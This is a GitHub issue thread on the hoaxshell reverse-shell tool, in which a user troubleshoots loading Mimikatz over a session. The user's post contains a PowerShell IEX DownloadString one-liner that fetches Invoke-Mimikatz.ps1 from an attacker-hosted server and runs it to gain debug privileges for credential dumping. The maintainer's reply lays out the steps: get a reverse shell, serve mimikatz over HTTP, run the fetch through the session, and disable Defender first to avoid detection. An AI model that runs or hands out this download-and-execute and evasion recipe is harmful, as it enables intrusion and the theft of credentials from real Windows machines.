### ISSUE TITLE
Issue - invoke command NOT working

### ISSUE THREAD

**Issue by techstartupexplorer** [t3l3machus/hoaxshell#9]
PS C:\Users\Administrsator>powershell IEX(New-Object Net.WebClient).DownloadString('https://MyIP/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"' - NOT Working. Error below.  its either port 443 or 4443 its not working. I downloaded mimikatz ps1 file same folder as hoaxshell.py folder.

Payload is using SSL.

Note: I replaced my ip with "myip" to hide my ip.

Exception calling "DownloadString" with "1" argument(s): "Unable to connect to the remote server"
At line:1 char:1
+ powershell IEX(New-Object Net.WebClient).DownloadString('http://192.1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException

Invoke-Mimikatz : The term 'Invoke-Mimikatz' is not recognized as the name of a cmdlet, function, script file, or
operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try
again.
At line:1 char:108
+ ... ://MyIP:4443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Comman ...
+                                                   ~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Invoke-Mimikatz:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

**Comment by t3l3machus** [comment]
Here's how it's done:
1. Start hoaxshell and get a reverse shell.
2. Start a python http server on the directory you have saved mimikatz:
![image](https://user-images.githubusercontent.com/75489922/187626259-bcc74aad-b485-4f75-807d-c20a5949967a.png)

4. Execute invoke mimikatz web request through the hoaxshell session:
 
![image](https://user-images.githubusercontent.com/75489922/187626661-0d0fa822-0e87-42b7-9c7d-60be7e38d16c.png)

You should first try this with defender disabled because there's a very high chance mimikatz will get caught.
